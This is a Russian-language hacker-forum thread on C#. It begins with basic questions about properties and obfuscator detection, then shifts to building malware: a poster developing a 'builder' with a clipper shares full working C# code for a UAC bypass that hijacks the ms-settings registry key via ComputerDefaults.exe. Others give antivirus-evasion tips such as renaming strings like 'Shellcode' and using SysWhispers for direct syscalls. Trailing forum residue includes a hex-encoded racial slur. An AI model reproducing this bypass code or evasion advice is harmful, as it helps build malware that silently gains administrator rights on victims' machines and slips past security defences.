Вопросы по С#

Ingiborga · 25.04.2021

Я вроде изучаю тихо C# и все понятно, но вот гуглил, смотрел видосы и все равно не понимаю что такое { get; set; } може кто то найдется кто расскажет мне понятным мне языком. Понял только что можно обьявить ими доступ в приват класы или не так понял?

DildoFagins · 25.04.2021

Ingiborga сказал(а):

Я вроде изучаю тихо C#

Тогда почему спрашиваешь в теме по С++ и С?

Ingiborga сказал(а):

{ get; set; } може кто то найдется кто расскажет мне понятным мне языком

Это геттер и сеттер, позволяет назначить произвольный метод, который будет вызываться при установке (сеттер) или получения (геттер) значения свойства. { get; set; } означает геттер и сеттер по-умолчанию, { get; } будет означать, что извне класса свойство можно только получить, но не установить и тд. Почитай любой учебник по С# в разделе свойств (properties).

Quintessence · 02.05.2021

всем привет. появилась необходимость клонировать окно виндоус формс, что бы оно существовало отдельно от оригинала с измененными данными в ячейках. после декомпиляции экзешника оказалось, что он заобфусцирован. пожалуйста, подскажите как узнать обфускатор? или какие есть другие способы сделать копию дизайна формы иными словами клонировать окноб но со своими данными

DildoFagins · 02.05.2021

Quintessence сказал(а):

пожалуйста, подскажите как узнать обфускатор?

De4dot умеет определять некоторые обфускаторы.

r3xq1 · 03.05.2021

Quintessence сказал(а):

как узнать обфускатор?

1 - PiD Team's Protection ID
2 - DNiD
3 - RDG Packer Detector
4 - DIE
Вот здесь можешь посмотреть разные анализаторы

Quintessence сказал(а):

или какие есть другие способы сделать копию дизайна формы иными словами клонировать окноб но со своими данными

Ну, после того как ты декомпилируешь приложение, его нужно будет править чтобы окошечко WindowsForms стало видимым.
Ты можешь просто нарисовать похожее ( если умеешь )

nsidcz · 03.05.2021

Вообще это просто авто свойства - это синтаксический сахар, когда объявляешься свойства пиши их. А как оно внутри уже выше написали.

nsidcz · 03.05.2021

Не пробовал это - https://github.com/de4dot/de4dot ???

Quintessence сказал(а):

всем привет. появилась необходимость клонировать окно виндоус формс, что бы оно существовало отдельно от оригинала с измененными данными в ячейках. после декомпиляции экзешника оказалось, что он заобфусцирован. пожалуйста, подскажите как узнать обфускатор? или какие есть другие способы сделать копию дизайна формы иными словами клонировать окноб но со своими данными

Ingiborga · 10.05.2021

Пишу билдер, нужно взять из TextBox все строки что там есть и добавить их в exe в массив:

C#:

public static string[] str = new string[]

       {

"%SAIT1.RU%",

"%SAIT2.RU%",

"%SAIT3.RU%",

"%SAIT4.RU%",

       };

Просто взять стриг и поменять его не проблема используя dnlib method.Body.Instructions.Operand = "SAIT1.RU";
А как быть в моем случае? Создавать кучу TextBox не вариант в билдере. Строк может быть 1000 и более

Разбивать строки в конечном exe вида "\nSAIT1.RU\nSAIT2.RU" то же не вариант
Хочу именно переменную впихать в exe с массивом строк.

DildoFagins · 10.05.2021

Ingiborga сказал(а):

Хочу именно переменную впихать в exe с массивом строк.

Насколько я помню, в MSIL нет "литерала" для константного массива. Нужно будет сделать статический конструктор, проинициализировать массив специальным опкодом (что-то типа NewArr, или как-то так он назывался), а потом заполнить его по одному элементу (сгенерировать опкоды LdStr, Stelem и тд, названия опкодов может напутал). Мне кажется, что это - бессмысленная дрочь в твоем случае, лучше сделай так:

Ingiborga сказал(а):

Разбивать строки в конечном exe вида "\nSAIT1.RU\nSAIT2.RU" то же не вариант

Ingiborga · 10.05.2021

DildoFagins сказал(а):

Насколько я помню, в MSIL нет "литерала" для константного массива. Нужно будет сделать статический конструктор, проинициализировать массив специальным опкодом (что-то типа NewArr, или как-то так он назывался), а потом заполнить его по одному элементу (сгенерировать опкоды LdStr, Stelem и тд, названия опкодов может напутал). Мне кажется, что это - бессмысленная дрочь в твоем случае, лучше сделай так:

Действительно дроч). Разбил в конечном так работает:

C#:

public static string[] urklist = urlSTR.Split(new[] { Environment.NewLine }, StringSplitOptions.None);

Прост лишнего кода не хотел ну лан.

Ingiborga · 10.05.2021

Так вышло да же лучше, не подумал раньше за то теперь можно 1 строку шифрануть и все и получается кода меньше

Ingiborga · 13.05.2021

Может кто видел бесплатно или поделитесь UACBypass получше этого:

C#:

 public static void Run()
        {
            if (Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\shell\open\command") == null)
                ElevateMe();
            else
                Registry.CurrentUser.DeleteSubKey(@"Software\Classes\ms-settings\shell\open\command");
            if (!IsElevated())
                Environment.Exit(0);
        }
        private static bool IsElevated()
        {
            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
            {
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
        }
        private static void ElevateMe()
        {
            try
            {
                CreateKey(string.Empty, Assembly.GetEntryAssembly().Location);
                CreateKey("DelegateExecute", string.Empty);
                Process.Start(@"C:\Windows\System32\ComputerDefaults.exe");
                Environment.Exit(0);
            }
            catch { }
            void CreateKey(string name, string val)
            {
                RegistryKey key = Registry.CurrentUser.CreateSubKey(@"Software\Classes\ms-settings\shell\open\command");
                key.SetValue(name, val);
                key.Close();
            }
        }

Это паблик с гитхаба чуток переделанный.
Не везде срабатывает.

x4k · 13.05.2021

Ingiborga сказал(а):

Может кто видел бесплатно или поделитесь UACBypass получше этого:

C#:

 public static void Run()
        {
            if (Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\shell\open\command") == null)
                ElevateMe();
            else
                Registry.CurrentUser.DeleteSubKey(@"Software\Classes\ms-settings\shell\open\command");
            if (!IsElevated())
                Environment.Exit(0);
        }
        private static bool IsElevated()
        {
            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
            {
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
        }
        private static void ElevateMe()
        {
            try
            {
                CreateKey(string.Empty, Assembly.GetEntryAssembly().Location);
                CreateKey("DelegateExecute", string.Empty);
                Process.Start(@"C:\Windows\System32\ComputerDefaults.exe");
                Environment.Exit(0);
            }
            catch { }
            void CreateKey(string name, string val)
            {
                RegistryKey key = Registry.CurrentUser.CreateSubKey(@"Software\Classes\ms-settings\shell\open\command");
                key.SetValue(name, val);
                key.Close();
            }
        }

Это паблик с гитхаба чуток переделанный.
Не везде срабатывает.

Старайся заменять слова Payload, Viru, Hack, Fuck, Suck,Shellcode и прочие. Для замены функций (strings, по которым тебя потом оценивает любой ав на direct system calls используй syswhipers). И да. в коде есть ошибка. Поищи на StacksOverflow. там естьб полнвя версия этой реликвии. Вон бабушка рядом, говорит помню - гавно)

Ingiborga · 13.05.2021

x4k сказал(а):

Старайся заменять слова Payload, Viru, Hack, Fuck, Suck,Shellcode и прочие. Для замены функций (strings, по которым тебя потом оценивает любой ав на direct system calls используй syswhipers). И да. в коде есть ошибка. Поищи на StacksOverflow. там естьб полнвя версия этой реликвии. Вон бабушка рядом, говорит помню - гавно)

Все заренеймит обфускатор в любом случае. А по факту мне моя бабушка и посоветовала

Вот я и ищу че посвежее.

Ingiborga · 13.05.2021

Пишу чисто в образовательных целях билдер с клиппером типо мультитула. Как доделаю выложу на xss.
Будет не плохо если кто что посоветует. Заранее спасибо.

x4k · 13.05.2021

Ingiborga сказал(а):

Все заренеймит обфускатор в любом случае. А по факту мне моя бабушка и посоветовала Вот я и ищу че посвежее.

Хм =) иди эмпирическим путем: возьми, не поленись два больших кс, в одном попробуй стереть комментарии и заменить, хотя бы при помощи того же сублиме, vars и classes и strings и тп. во втором - используй обфускатор. чекни. слежующий шаг - используй обфускатор на вручную отредактированном файле. чекай. =) и не гони - мазоли на пальцах и растительность на тыльной стороне ладоней - миф =)

Ingiborga · 13.05.2021

x4k сказал(а):

Хм =) иди эмпирическим путем: возьми, не поленись два больших кс, в одном попробуй стереть комментарии и заменить, хотя бы при помощи того же сублиме, vars и classes и strings и тп. во втором - используй обфускатор. чекни. слежующий шаг - используй обфускатор на вручную отредактированном файле. чекай. =) и не гони - мазоли на пальцах и растительность на тыльной стороне ладоней - миф =)

Да лан...ты хочешь сказать комменты в виде //епана < компилятся в VS 2019 например? Или как АВ снимут рандом обфускацию? это же пздц...

x4k · 13.05.2021

Ingiborga сказал(а):

Да лан...ты хочешь сказать комменты в виде //епана < компилятся в VS 2019 например? Или как АВ снимут рандом обфускацию? это же пздц...

Ничего не хочу сказать. Я просто предложил проверить, только и всего. Потом ты лучше скажешь. Идет?) Как снимут - очень просто. Подобные методы или способ ПРЯМО СЕЙЧАС юзает 20-100 человек. из них 1-2 попадают на расширенный тест. Далее: смотришь в окно -> 2021 год -> ИИ в самом разгаре... уже как лет 6... -> как только ты произнесешь слово - "ПИЗДЕЖЬ какой-то" - YARA rule уже в Яра-базе - > вывод: работа руками = результат. вывод два: голова не только чтобы туда кушать ))))

Ingiborga · 13.05.2021

x4k сказал(а):

Ничего не хочу сказать. Я просто предложил проверить, только и всего. Потом ты лучше скажешь. Идет?)

Ну одно дело менять структуру то да, детект будет разный сильно. А просто ренеймить хоть рандомно обфускатором хоть в ручную, какая разница? Не вижу смысла.

x4k · 13.05.2021

Ingiborga сказал(а):

Ну одно дело менять структуру то да, детект будет разный сильно. А просто ренеймить хоть рандомно обфускатором хоть в ручную, какая разница? Не вижу смысла.

Оке. Каждый ... думает ))) как хочет =) Но даже не это главное) будет время и интерес - естественно проверишь. напиши в пм потои. мб я реально гоню, изобретая велосипеды) а структура, как раз - пянятие системная (в отличии от того, что я упомянул). Как бы ты ее не менял, открою тебе секрет небольшой +)))) знаки, типа = ; , . @ # и остальные - не заменить ничем. И даже нигде, прикинь? Догадываешься о чем я?)

Вопросы по С#

(L3) cache

TPU unit

floppy-диск

TPU unit

(L3) cache

HDD-drive

HDD-drive

(L3) cache

TPU unit

(L3) cache

(L3) cache

(L3) cache

6767694e 61635361 72656d6d 0a Li-En

(L3) cache

(L3) cache

6767694e 61635361 72656d6d 0a Li-En

(L3) cache

6767694e 61635361 72656d6d 0a Li-En

(L3) cache

6767694e 61635361 72656d6d 0a Li-En